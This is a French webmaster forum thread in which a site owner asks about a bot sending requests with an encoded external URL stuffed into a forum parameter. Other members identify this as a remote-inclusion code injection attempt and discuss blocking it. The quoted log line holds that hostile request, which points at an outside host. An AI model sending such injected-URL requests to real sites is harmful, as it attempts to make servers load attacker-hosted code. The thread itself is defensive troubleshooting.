Robot avec requete étrange sur mon site

Nouveau WRInaute
Bonjour,

J'espere que je suis dans la bonne catégorie. Il y a un robot qui passe sur mon serveur. Il lance environ 150 requetes en 2 minutes. Cependant une requete sur deux est faite avec une url impossible.

Exemple :
212.80.70.194 - - [04/Mar/2008:08:08:08 -0500] "GET /Forum?section=7&idsujet=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&pagemessage=1 HTTP/1.0" 500 1761

La requete propre devrait etre comme suit :
212.80.70.194 - - [04/Mar/2008:08:08:08 -0500] "GET /Forum?section=7&idsujet=2&pagemessage=1 HTTP/1.0" 200 1761

J'ignore pourquoi il ajoute une autre url au milieu de sa requete. Et en plus ce n'est jamais le meme url qu'il ajoute au milieu.

Il utilise aussi cet ip :

62.42.232.62
66.36.160.110
212.80.70.194

J'ai fait des recherche avec l'ip mais j'ai rien trouvé. Es-ce que quelqu'un pourrait me donner une piste ou une direction de quoi chercher ?

merci
 
WRInaute accro
Il essaie de t'injecter une page qui mène direct sur une verole.

deja parlé dans un autre post y a pas si longtemps.
 
WRInaute accro
Je remarque, effectivement, une recrudescence de tentatives d'injection de code avec les includes. Sauf que je n'utilise aucun include dans mes url :roll:
donc je bloque avec le htaccess
 
Nouveau WRInaute
Merci pour les infos.

Je suis pas assez calé pour savoir de quel facon ca peux m'infecter. À premiere vu c'est pas trop dangereux, mon serveur retourne une erreur 500. Du coté serveur le getParameter("idsujet") recoit un contenu invalide et ca plante sans plus de domage.

C'est seulement tanant de voir soudainement apparaitre 150 visiteurs en meme temps, ca ne fait pas trop crédible.

Je ne sais pas trop quoi chercher sur le forum, mais si vous avez le lien vers la discussion dont cthierry parle envoyer la moi svp. Ca me donnera une piste de solution.

Dans mon cas j'utilise apache-tomcat-5.5.17 et ca ne semble pas supporter les .htaccess :cry:

Merci
 
WRInaute passionné
cthierry a dit:
Il essaie de t'injecter une page qui mène direct sur une verole.

deja parlé dans un autre post y a pas si longtemps.

serait ce de celui - ci dont tu parles ?

https://www.webrankinfo.com/forum/t/inquiet-logs-suspects.89698/

si oui, je suis preneur de toute technique pour tenter une parade

Leonick a dit:
Je remarque, effectivement, une recrudescence de tentatives d'injection de code avec les includes. Sauf que je n'utilise aucun include dans mes url :roll:
donc je bloque avec le htaccess

Leonick de quoi veux tu parler avec .htaccess dans ce cas de figure ??

merci
 
Discussions similaires
Haut